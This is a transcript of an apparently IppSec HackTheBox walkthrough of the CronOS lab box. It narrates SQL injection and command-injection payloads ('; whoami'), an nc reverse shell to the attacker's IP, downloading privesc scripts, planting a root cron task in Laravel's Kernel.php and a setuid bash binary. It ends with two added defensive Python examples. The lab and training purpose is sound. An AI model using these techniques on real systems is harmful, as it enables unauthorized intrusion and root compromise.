HackTheBox - CronOS

Captions
Hey guys, the HackTheBox team has retired CronOS, which happens to be one of my favorite boxes because it's not really that challenging. You know exactly what to do at every step, but every step requires you to think a little bit, which is awesome. This is it, let's jump into the box.

Like all boxes, we have to start with an nmap. So nmap -sC, safe scripts, -sV, enumerate versions, -oA, output all formats, give it a name like nmap, and then the IP address, which is 10.10.10.13. I'm not going to run this because it takes time; instead I have all the output saved, so it's just less that file, nmap/nmap, and we can see what is listening. We have port 22, SSH; 53, which is DNS. Odd that that's on TCP, normally DNS is UDP. And then port 80, which is HTTP. We know most about HTTP, so that's the first thing I'm going to go to.

So 10.10.10.13, we get the Apache2 Ubuntu default page. When you see this Apache default page, generally there's a misconfiguration somewhere or you're just not going down the right route. So what I'm going to do is turn on intercept, refresh the page, and then change this Host value to be the hostname of the box, which is cronos.htb. You know that from the admin panel of HackTheBox. So when we forward this request and then go back to our Firefox, we do see Cronos, and if this didn't work then I'd fire up DirBuster against the IP address and see if there's any hidden files or things like that. Going to these URLs, we see laravel.com/docs for Laravel. This is outside the HackTheBox domain, so out of scope. Laracasts, outside the domain. News, again they're linking me off of 10.10.10.13 or cronos.htb, which means they're out of scope. I don't want to try to attack laravel.com, which is a PHP framework. Glancing at the source, I don't see anything. So what I'm going to do now is edit my hosts file to put 10.10.10.13 and cronos.htb in it, save that, and now I don't have to edit the packet, I can just go to it by domain name. So I'm going to open up DirBuster, and on my target URL, let's put this at, I guess that's fine, 50-some threads, and then we have to go to /usr/share/wordlists/dirb. And I want to go dirbuster; I think DirBuster has the better list. I'll do directory-list-2.3-medium. I disabled Be Recursive because I like to finish sometime today, and this should be fine. I'm going to start this up and let this run in the background while I do some other things.

So we did see that DNS was listening on this box, so we're going to do nslookup and change your server to be 10.10.10.13, and we can do the IP address and we see that resolves to ns1.cronos.htb. If you wanted to, you could also just do cronos.htb and you see its hostname that way, just in case you did have access to the web portal and got the hostname that way. The next thing I check is to do DNS zone transfer records, to see if it's configured where we can do a zone transfer. And the reason why I'm trying this first is because zone transfers require DNS TCP. They're what DNS servers use to transfer entire zones, like master/slave configurations. I have a horrible time explaining this right now, but let's just try it. So dig axfr is the command, @10.10.10.13, and we're going to transfer the cronos.htb zone. Hope this is correct, and it is. So we see a few more subdomains: we have admin.cronos, ns1 which we saw earlier, www, and then just the regular default. Going back into DirBuster, do we see anything? Nope, not really. So let's edit the hosts file to add the new domain names, www.cronos.htb and admin.cronos.htb. OK, save that, and now we can go to the URLs. www is the same. ns1, default Apache, so HTTP Apache is not configured for ns1.cronos.htb. Let's see admin, and we get a user panel.

So let's just try admin/admin, admin/password, admin... and I'm going to do it in Burp so you can see it, because it's masking passwords. Submit. We'll do a common SQL injection, URL encode this, send it off, and nothing. So the next thing I'm going to do is try to sqlmap this. So admin/admin, submit, copy, and then create the login request, and we'll be able to point sqlmap at this login request. And I like doing it this way just because you don't have to worry about giving it a bunch of flags to change the user agent, put in a POST request and data. It becomes really easy when you can just do sqlmap -r login_request. Super simple, and then we'll let this run and in just a few seconds we should get a response back. But while that's going, check DirBuster: nothing new, and it's still going because we see 13 minutes, no error messages. And the first thing that comes back from sqlmap: sqlmap got a 302 redirect to welcome.php. We try to log in, send this to Repeater, it's not sending a redirect, which means something good happened with sqlmap. So do we want to follow it? Yeah. See if the POST request... and the original POST data, new location, I guess so. But the key thing to look at is, I guess I was doing UNION just at the time, but the key thing to look at is we're doing user injection at this point when it detected that.

So while sqlmap's running, let us try doing something in the user. So ' and the parameter... I have to drop this request. So admin', doesn't matter what's there, so ' and that parameter, and we'll send a comment. Click Submit and we get in. So the username was SQL injectable. Awesome. So Net Tool, we have ping and traceroute. Let us just try basic command injection: put a semicolon, whoami, click Execute and see what happens. And we should have done that in Burp, so what we'll do, HTTP history, get that last one, I'm going to see the response, now ping, www-data. So it looks like we did get command injection: we have the ping output and then www-data. Awesome. So send this over to Repeater to see what the request looks like and send it again so you can see. The interesting thing is it will say we have command injection in the command as well, so both these parameters are command injectable, and this developer should just be shot. So let us verify what we think: let's just change command to be whoami and we still get www-data, the user. We can change it to date and we see, yeah, it is definitely doing command injection.

So next thing, let's Google pentestmonkey reverse shell cheat sheet. So I don't have Firefox configured to use my Burp certificate yet, so let's do that. Save file, Preferences, Security, now Advanced, Certificates, View, Servers, Authorities, I think it's Authorities, Downloads, CA cert, trust to identify websites. Yep, there we go, now my browser is no longer complaining about Burp. Reverse shell cheat sheet, we'll try this first one, that's bash. So do it, ifconfig, and that's not... sqlmap did not say there is SQL injection. So nc -lvnp will listen on 8081. Our IP is 10.10.15.28. So go to Burp, paste that command, 10.10.15.28, I think, yep, change this to be 8081, URL encode, and I'm just pressing Ctrl+U to do that quickly instead of right-clicking and doing it. And we don't get anything, so this one didn't work. And we could just go down the line to try the second one. I normally try this one because a lot of these boxes have nc on them, they just don't have the version of nc which allows you to use an argument to give a file. So we can do which nc and see, yes we do have it. So do this, 10.10.15.28 and port 8081, we go to run this, that should have worked... oh, URL encode. So highlight, URL encode, go, and we get a shell.

So first things first, let's get us a real shell. So python -c 'import pty; pty.spawn("/bin/bash")', then, OK, I'm going to background this, stty raw -echo, foreground, TERM variable not set. So let's explore, and what is my TERM variable? Should just be xterm-256color. Screen, set TERM, OK, terminal screen, and that's why, because I'm in tmux right now. So export TERM=screen and now I can use clear. Awesome. And it just dawned on me that I didn't explain what I was doing. What I was doing is just getting a pseudo terminal that allows me to do tab auto-completion, so it started off with me pressing Ctrl+Z to background the process, then I typed stty raw -echo, which told my terminal not to process special characters like tabs and instead just send them right on through to the next terminal, which is that Python TTY session listening on the remote box. And when I combine those two, it lets me do those special characters.

But the next step is back on our local box, and I'm going to rename this to be web server because that's what we're going to do. We got to run a few privesc scripts to identify common ways to privesc. So I have scripts in /opt/linux-privesc. /opt is just where I throw scripts and stuff I download, and I try to stay organized. So these are three I use: LinEnum, unix-privesc-check and the unix-privesc shell script. You can just Google all those and download them, and do python -m SimpleHTTPServer to start up something. Back on this process, type ifconfig, get my IP, it is 10.10.15.28, and then foreground it. So now I can go to /dev/shm, let's create... got it. And /dev/shm is a ramdisk, which means if the server reboots all the files get deleted, so I don't have to worry about cleaning up. So wget, I think -R is recursive, we'll find out, 10.10.15.28:8000, no... is it? There we go, lowercase -r is recursive, and it put it in a folder, that's fine. So now we can run these scripts, so we'll start off with LinEnum.sh, scroll up as this goes. And as I'm scrolling I notice something really odd right now: there's a crontab that runs every minute by the user root and it's running a Laravel command, which is a PHP framework that we saw earlier at the web page, and schedule:run. So my guess would be, if we can get Laravel to execute a command by sending it a scheduled task, we'll be able to get code execution. Awesome, so that's where I'm going to start my search first. Let's copy this and we can stop the enumeration because we have an idea what to do. No scheduled commands to run.

So now to get a trusty Google and search how to do a command, so let's do Laravel create schedule command. Laravel docs, always entertaining, or just docs are always good, I don't know why I said that. And then easylaravelbook.com, that sounds good. So the first thing it's doing, scrolling, what's the command once it's set to run, inspire, not sure what inspire is, OK. Your own commands by the make:console generator, we may want to come back into this. Scheduling a command, this is probably what we want to do. So we edit the app/Console/Kernel.php file, find this protected function and schedule a command. So this is scheduling a command that we created up here, but we can go over to the Laravel docs just to look over to see if there's other ways we can define commands. So this is defining schedules, we don't care about that. Schedule frequency, every minute, that's definitely going to be useful. Still searching, time constraints, running tasks, maintenance tasks, output, task hooks. Oh, did I miss something? Nope. So go back, let's see schedule command terminal shell. Does this work? ...list, calling commands outside of the CLI, scheduling commands, scheduling terminal commands. So we want to do $schedule->exec('composer self-update'). So this is running the bash command composer self-update every day. So combining these two pages we should be able to get a Laravel task created.

So first things first, we have to find that file, Kernel.php. So we can do find / -name and then output errors to the bit bucket. Shouldn't take too long to find. We do see it in /var/www/laravel: a Console/Kernel.php and app/Console/Kernel.php. That looks like what we want, so we're going to go into that directory and edit it. So we want to find that protected function section, and right here, function schedule. So let's create one, so it was $schedule->exec, and let's see, what do we want to do? Let's just touch /tmp/ipsec, and the reason I'm doing this is just to see what user I'm running under. And we want to do it every minute, I think that's how it did it, I guess we'll find out. Write this. Date, so we have 40 seconds, so let's see, hourly, we need open/close parentheses, minute, if I could type, there we go. OK, so in about 20 seconds it should write to /tmp/ipsec, and if it's root we know we got some running commands as root. Man, what I stumble so hard on that. 53 seconds, 58 seconds, so ls -la, let us hope for /tmp/ipsec, and we do see it. Check and we see root. Awesome.

So we're going to go to /dev/shm and compile a TTY shell, a setuid shell. So check if gcc... it's not installed. See, is it 64-bit? Yes it is. So we can go back to the web server, we can stop this. Yeah, well, just trying to figure out how to stay organized, don't mind me. So Documents/htb, and this is CronOS, boxes, cronos, OK. So we have to create a setuid program. To do that it's just a C file, int main(void), OK, then we want to setuid to 0, setgid to 0, and then run system /bin/bash. Close this, compile, so gcc setuid.c -o, we'll call this ipsec, ./ipsec, make sure it runs, looks good. So now we want to send this over, so again python -m SimpleHTTPServer, go back to the shell, wget, we can use curl, curl 10.10.15.28:8000/ipsec, call it ipsec, done. So ls -la, it's not executable, so let's make it executable and ./ipsec, good, it runs. So now for this program to work we have to give it the sticky bit and change it to root. Or not sticky bit, we have to give it the SUID bit and then change the owner to root. So cd /var... OK, so what we're going to do, touch command to be chown root /tmp/ipsec and chmod 4755 /tmp/ipsec. The 4 is the setuid bit, read/write/execute, read/execute, read/execute. OK, and now we wait for the new minute, and looks like we had just literally missed it. Yep. So now we're stuck at a waiting game for another minute for that cron to run. Can I set the date? 3:35:58, done. Only root can set date. I was hoping to speed up the cron. 33 seconds left, so in about 30 seconds that cron will run and then we should be able to jump to root. Check date again, so ten seconds, so sleep 10; ls -la, and when this finishes we will have root. And a second... there we go, and we don't. Oh crap, I did /tmp/ipsec, not /dev/shm. So now we have to go back and do that all over again. cd /var/www/laravel, the Kernel, /dev/shm, OK, 25 seconds. So if we do ls -la on /tmp we do see the sticky bit is now set on ipsec, the only problem is there's no file there, zero bytes. So if I had made that writable by everyone, chances are we wouldn't have to wait this minute again, but I did not. cd -, if you don't know, - is previous directory. So /dev/shm, back to Console, so a little handy trick. And now the sticky bit, root, root owns it on this. So we do ./ipsec then id, we should have been root. We are not root. It ran.

Check mount permissions, oh /dev, let's see, where's /dev, there it is. So /dev is actually mounted nosuid, so we can't do the file there. So back to waiting a minute. Kernel, let's just see, it's owned by root, we can just cp this file to /tmp, and we'll just move it actually, hopefully it doesn't ask to overwrite. Date, 40 seconds left. So the nosuid bit means anything in that mount can't use that setuid function. So since that was set on /dev and there's no like /dev/shm in the mount, well then the nosuid bit is set and it breaks that. So it shouldn't be set on mount on /, which is what /tmp is. So let's check, oh that's /boot, sda, the first step, mapper, here we go. So this is what /tmp falls under and we don't have nosuid, so this time it should work. ls -la, so now we see stuff has written to that file, ./ipsec, id, and we are root. So we can go in the root directory and if we wanted to, read that file. So hope you guys enjoyed this video, take care and have a good night.
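The Net Tool command injection in the video (a semicolon and whoami appended to the ping target) comes from pasting user input straight into a shell string. The following Python is an added example, not code from the video or from the CronOS box, showing that pattern beside a hardened version: the target is validated as an IP literal or a syntactically valid hostname and ping is started with an argv list and no shell, so ';', '&&' and backticks carry no meaning, and a leading '-' cannot be smuggled in as an extra ping option. The option -c 1 and the helper names are my own choices.

```python
"""Ping-tool input handling: the injectable pattern beside a hardened one.

Added example; the unsafe function only builds the string so the effect of
shell metacharacters is visible, it never executes anything.
"""
import ipaddress
import re
import subprocess
from typing import List

# One DNS label: 1-63 chars, alphanumeric or '-', no leading/trailing '-'.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


def unsafe_shell_command(target: str) -> str:
    """The injectable pattern: untrusted text concatenated into a shell line.

    Returned rather than run: with target "10.10.10.13; whoami" the shell
    would execute ping and then whoami as the web server user.
    """
    return "ping -c 1 " + target


def validate_target(target: str) -> str:
    """Accept exactly one IPv4/IPv6 literal or one syntactically valid hostname."""
    target = target.strip()
    if not target or len(target) > 253:
        raise ValueError("empty or over-long target")
    try:
        return str(ipaddress.ip_address(target))  # canonical IP literal
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError(f"rejected target: {target!r}")


def is_accepted(target: str) -> bool:
    """Convenience predicate around validate_target."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_argv(target: str) -> List[str]:
    """Build an argv list: no shell is involved, so ';', '&&', '`' are inert.

    The hostname grammar forbids a leading hyphen, so a value like
    "-c 9999 ..." cannot become an additional ping option either.
    """
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str, timeout: float = 5.0) -> str:
    """Run ping via the argv list with shell=False (not exercised by the test)."""
    result = subprocess.run(
        build_ping_argv(target), capture_output=True, text=True, timeout=timeout
    )
    return result.stdout


if __name__ == "__main__":
    samples = ["10.10.10.13", "ns1.cronos.htb", "10.10.10.13; whoami",
               "-c 9999 10.10.10.13"]
    for t in samples:
        print("shell string:", unsafe_shell_command(t))
        try:
            print("argv        :", build_ping_argv(t))
        except ValueError as exc:
            print("argv        : REJECTED,", exc)
```

The allow-list plus argv approach is the durable fix; quoting alone (escapeshellarg in PHP, shlex.quote in Python) still leaves the option-injection case open unless a "--" separator or validation is added as well.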
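The last part of the video stalls on /dev/shm being mounted nosuid: the root-owned 4755 binary there ran as www-data until it was moved to /tmp, which lives on the root filesystem. This added Python example (my own code, not IppSec's) parses /proc/mounts-style text, resolves a path to its longest-prefix mount and reports whether a setuid bit on a file there would be honoured. The mount table is constructed and the device names are placeholders; the same function is what an administrator would run to audit that world-writable locations such as /tmp and /dev/shm carry nosuid.

```python
"""Does the mount under a path carry nosuid?

Added example, not from the video: parses /proc/mounts-style text,
resolves a path to its longest-prefix mount and reports whether the
kernel would honour a setuid bit on a file there.
"""
import os
import re
from typing import FrozenSet, List, NamedTuple, Optional


class Mount(NamedTuple):
    device: str
    point: str
    fstype: str
    options: FrozenSet[str]


# Constructed sample in /proc/mounts format; device names are placeholders.
SAMPLE_PROC_MOUNTS = """\
/dev/mapper/vg-root / ext4 rw,relatime,errors=remount-ro,data=ordered 0 0
udev /dev devtmpfs rw,nosuid,relatime,size=491992k,mode=755 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda1 /boot ext2 rw,relatime,block_validity,barrier,user_xattr,acl 0 0
tmpfs /run/user/1000 tmpfs rw,nosuid,nodev,relatime,size=100M,mode=700 0 0
"""

_OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")


def _unescape(field: str) -> str:
    """/proc/mounts writes space, tab, newline and backslash as \\ooo octal."""
    return _OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), field)


def parse_mounts(text: str) -> List[Mount]:
    """Parse 'device mountpoint fstype options dump pass' lines."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # tolerate blank or truncated lines
        device, point, fstype, opts = parts[:4]
        mounts.append(Mount(_unescape(device), _unescape(point), fstype,
                            frozenset(opts.split(","))))
    return mounts


def mount_for_path(path: str, mounts: List[Mount]) -> Mount:
    """Longest-prefix match, so /dev/shm wins over /dev for /dev/shm/x."""
    path = os.path.normpath(path)
    best: Optional[Mount] = None
    for m in mounts:
        prefix = m.point.rstrip("/") + "/"  # "/" stays "/", "/dev" -> "/dev/"
        if path == m.point or path.startswith(prefix):
            if best is None or len(m.point) > len(best.point):
                best = m
    if best is None:
        raise LookupError(f"no mount covers {path}")
    return best


def setuid_honoured(path: str, mounts: List[Mount]) -> bool:
    """True when the covering mount lacks nosuid, i.e. a 4755 root-owned
    file at this path would really run as root."""
    return "nosuid" not in mount_for_path(path, mounts).options


def report(path: str, mounts: List[Mount]) -> str:
    """One-line human-readable verdict for a path."""
    m = mount_for_path(path, mounts)
    flag = "nosuid" if "nosuid" in m.options else "suid honoured"
    return f"{path}: on {m.point} ({m.fstype}) -> {flag}"


if __name__ == "__main__":
    # Use the live table when available, otherwise the constructed sample.
    try:
        with open("/proc/mounts") as fh:
            table = parse_mounts(fh.read())
    except OSError:
        table = parse_mounts(SAMPLE_PROC_MOUNTS)
    for p in ("/dev/shm/ipsec", "/tmp/ipsec", "/boot/x"):
        print(report(p, table))
```

On a hardened host the interesting output is the other way round: /tmp and /var/tmp are usually separate tmpfs or bind mounts with nosuid,nodev (and often noexec), so the check reports "nosuid" for every world-writable directory and the scenario in the video cannot occur.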
Info
Channel: IppSec
Views: 65,334
Keywords: HackTheBox, HTB
Id: CYeVUmOar3I
Length: 28min 50sec (1730 seconds)
Published: Fri Aug 04 2017